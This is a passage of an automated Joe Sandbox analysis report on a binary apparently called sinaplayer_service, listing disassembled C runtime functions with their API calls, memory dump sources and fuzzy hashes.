                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000020,6D0F921D,?,?,?), ref: 6D0F8989
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,00000000,00000001,00000020,6D0F921D,?,?,?), ref: 6D0F899E
                                                                                                                                                                                                    • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR120(00000000,00000002,00000001,000000FF,00000020,6D0F921D,?,?,?), ref: 6D0F89CE
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,00000000,00000002,00000001,000000FF,00000020,6D0F921D,?,?,?), ref: 6D0F89D4
                                                                                                                                                                                                    • ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000020,6D0F921D,?,?,?), ref: 6D0F89E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 559173246-0
                                                                                                                                                                                                    • Opcode ID: d25726fc4a06f6caad06dbd0cb79798e9818e34caa745c3a58295f9eb49ffbc0
                                                                                                                                                                                                    • Instruction ID: 22493d821a16a528735d9d79ad4fcaae4d8f9660a5836c5b6ae88c27ab179995
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d25726fc4a06f6caad06dbd0cb79798e9818e34caa745c3a58295f9eb49ffbc0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D631D1F1D082168BFB10DF95C880BEEBBF4BF05710F694119DA45AB245D7708A42CB92
                                                                                                                                                                                                    Function 6D0A0969 Relevance: 10.6, APIs: 7, Instructions: 83stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A0951
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A099A
                                                                                                                                                                                                    • strlen.MSVCR120(?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A09ED
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A09F8
                                                                                                                                                                                                    • _fwrite_nolock.MSVCR120(?,00000001,00000000,?,?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A0A12
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A0A1C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0D4F91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ftbuf_errno_fileno_fwrite_nolock_invalid_parameter_noinfo_lock_filestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2817190391-0
                                                                                                                                                                                                    • Opcode ID: 88702f96ba2c63aad4ec932e20dcf58617016dfadc3c33144055913b9103e895
                                                                                                                                                                                                    • Instruction ID: a10284a4d413df561f4634c04b3613524bdeb96f6efffe3b7c9b3783737772a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88702f96ba2c63aad4ec932e20dcf58617016dfadc3c33144055913b9103e895
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6021367291C20E6BFB015FB68C4073E36E1AB86378F198328E5359F1DADBF8D9419601
                                                                                                                                                                                                    Function 6D0B08EE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fltout2.LIBCMT ref: 6D0B0917
                                                                                                                                                                                                      • Part of subcall function 6D09B131: $I10_OUTPUT.MSVCR120(?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016,?,0000015D,?), ref: 6D09B170
                                                                                                                                                                                                      • Part of subcall function 6D09B131: strcpy_s.MSVCR120(6D1092B2,?,?,?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016), ref: 6D09B190
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?,?), ref: 6D0E1087
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?,?), ref: 6D0E108E
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?), ref: 6D0E109A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?), ref: 6D0E10A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$I10___fltout2strcpy_s
                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                    • API String ID: 2050506888-2547889144
                                                                                                                                                                                                    • Opcode ID: e7dd649bc10b9dcce74dae2acfbca99c275779e6dd036a93948f2abc0156a9d2
                                                                                                                                                                                                    • Instruction ID: 1cc5b843a5c5c1f3518fb80007933299f5b0a370946e55b104eeadfd63ad11ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7dd649bc10b9dcce74dae2acfbca99c275779e6dd036a93948f2abc0156a9d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F821A772A0820A9FEB05DF79CD80FAFB7B8EF0A254F058169E615A7250F771DC448B61
                                                                                                                                                                                                    Function 6D0B2E0C Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0B2EB0,00000010), ref: 6D0B2E02
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF011
                                                                                                                                                                                                    • _errno.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF018
                                                                                                                                                                                                    • _errno.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF05D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF068
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: 3d2cd5dff257d247794e35ad327914d4f5807284a7270f65af17be39aaf0f95f
                                                                                                                                                                                                    • Instruction ID: 78d37ec14e142165479c5398555217d5b5971d214a66ccf71fdeb6f135f8d27d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2cd5dff257d247794e35ad327914d4f5807284a7270f65af17be39aaf0f95f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED215B3190C3125AF7265F78C88072E7AB4BF47328F928219D6709F2D0CB76894197A1
                                                                                                                                                                                                    Function 6D093E6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D5CF5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D5D00
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0D5D0D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0D5D18
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    • Opcode ID: 41eae63a9d4462465d4519238392044cd4c182868a480cdf31359df9f0fb5fa0
                                                                                                                                                                                                    • Instruction ID: 8b9191a6da874d2d4f92bf80cd16178475a019bd16baacec6751bc4a5ee673e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41eae63a9d4462465d4519238392044cd4c182868a480cdf31359df9f0fb5fa0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4821B335D0420A9EFB118FB8C8047AF7BB4EF49324F114216E934AB2C0D776C4109FA1
                                                                                                                                                                                                    Function 6D0ACABB Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,?,?,6D0ACAB6), ref: 6D0ACAC0
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACAF4
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB02
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB1A
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB29
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB39
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3279498665-0
                                                                                                                                                                                                    • Opcode ID: dac9b63965c8a3a3c11b5e2e2c346cc4ad763e5edabb738fc3ccdeab2cbd9301
                                                                                                                                                                                                    • Instruction ID: 32c1bbda7d81e418c4e45181c57f407002ce62ebca4f636264f9769ea5bbe678
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dac9b63965c8a3a3c11b5e2e2c346cc4ad763e5edabb738fc3ccdeab2cbd9301
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F11C86A914292BBFB115AF55C48E7F7AFCEA52254316442BFC09D3242EB61CC0081B5
                                                                                                                                                                                                    Function 6D0FC042 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,6D163B90,00000104,00000000,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FC05E
                                                                                                                                                                                                    • _parse_cmdline.LIBCMT ref: 6D0FC085
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D0FC0A8
                                                                                                                                                                                                    • _parse_cmdline.LIBCMT ref: 6D0FC0C2
                                                                                                                                                                                                    • __cwild.LIBCMT ref: 6D0FC0D9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _parse_cmdline$FileModuleName__cwild_malloc_crt
                                                                                                                                                                                                    • String ID: 0'Z
                                                                                                                                                                                                    • API String ID: 953782237-2320578061
                                                                                                                                                                                                    • Opcode ID: e9720279e2bcb3a0f2094256a63af30a8fee3222283eb83a53a870a1c3dce0bb
                                                                                                                                                                                                    • Instruction ID: cd385b7f9827e85b8cd668012a274e3b3612aa851c94f0d9df71ea6cbeb021bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9720279e2bcb3a0f2094256a63af30a8fee3222283eb83a53a870a1c3dce0bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0411B6B1844149BBEB10CBE8D8C1EAF77BCEA462147604756EA21D3140D7719A0787A5
                                                                                                                                                                                                    Function 6D0A3960 Relevance: 10.6, APIs: 7, Instructions: 62stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __unDName.MSVCR120(00000000,?,00000000,?,?,00002800,6D094110,0000000C), ref: 6D0A3979
                                                                                                                                                                                                      • Part of subcall function 6D0A38B1: _lock.MSVCR120(00000005,6D0A3948,00000064,6D0A397E,00000000,?,00000000,?,?,00002800,6D094110,0000000C), ref: 6D0A38D7
                                                                                                                                                                                                    • strlen.MSVCR120(00000000), ref: 6D0A398C
                                                                                                                                                                                                    • _lock.MSVCR120(0000000E), ref: 6D0A39A9
                                                                                                                                                                                                    • malloc.MSVCR120(00000008), ref: 6D0A39BB
                                                                                                                                                                                                    • malloc.MSVCR120(-00000004), ref: 6D0A39CC
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000004,00000000), ref: 6D0A39E0
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0A3A05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _lockmalloc$Name__unfreestrcpy_sstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3329257654-0
                                                                                                                                                                                                    • Opcode ID: 0c635f27a3814d14624eed1c2bc9c4dc3cc03fb63c6868892f20899d3367e5a6
                                                                                                                                                                                                    • Instruction ID: addca0690d783d7665dae2476e75f3695a13bd1294f99f0f2d8b0398ec877456
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c635f27a3814d14624eed1c2bc9c4dc3cc03fb63c6868892f20899d3367e5a6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E11E0B1D08713BBF7019BB4DC41B6AB7E8BF1A314F01855AE928DB282EB31D940C694
                                                                                                                                                                                                    Function 6D08ED30 Relevance: 10.6, APIs: 7, Instructions: 61memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0DDA8F
                                                                                                                                                                                                    • _callnewh.MSVCR120(6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000), ref: 6D0DDAB3
                                                                                                                                                                                                    • _callnewh.MSVCR120(6D0FC0AD,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0DDAD6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0DDADC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _callnewh$AllocHeap_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3215684309-0
                                                                                                                                                                                                    • Opcode ID: d282db2b2c91a082747512f1744d78d6e033786cbeeadcf0612bb918670a9dac
                                                                                                                                                                                                    • Instruction ID: f4a4f34ffdaea24b1ad345de185870392c212dd85ce72fca9a70806d196d57b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d282db2b2c91a082747512f1744d78d6e033786cbeeadcf0612bb918670a9dac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A001D63935C316ABFB011B2C9800F6A27ACDB82668F16412AEA10CB1D0EF75D8009A71
                                                                                                                                                                                                    Function 6D094EA2 Relevance: 10.6, APIs: 7, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D094F30,00000010), ref: 6D094E98
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D094F30,00000010), ref: 6D0DE1BB
                                                                                                                                                                                                    • _errno.MSVCR120(6D094F30,00000010), ref: 6D0DE1C2
                                                                                                                                                                                                    • _errno.MSVCR120(6D094F30,00000010), ref: 6D0DE1F9
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D094F30,00000010), ref: 6D0DE204
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: 004982445fcdf572f574071e1886bbc019c59fde4253a5c1ab286cc67d3cc551
                                                                                                                                                                                                    • Instruction ID: a2aa478fc3fbe5bccba0cd74cf384d37ef0422cfe3ce016d60c11b5a9cc6818f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 004982445fcdf572f574071e1886bbc019c59fde4253a5c1ab286cc67d3cc551
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2711E376919711AEF7025F68C88036DB6A0BF4A328F531345D5B49F2F1CBB8C840AB95
                                                                                                                                                                                                    Function 6D09CBBC Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
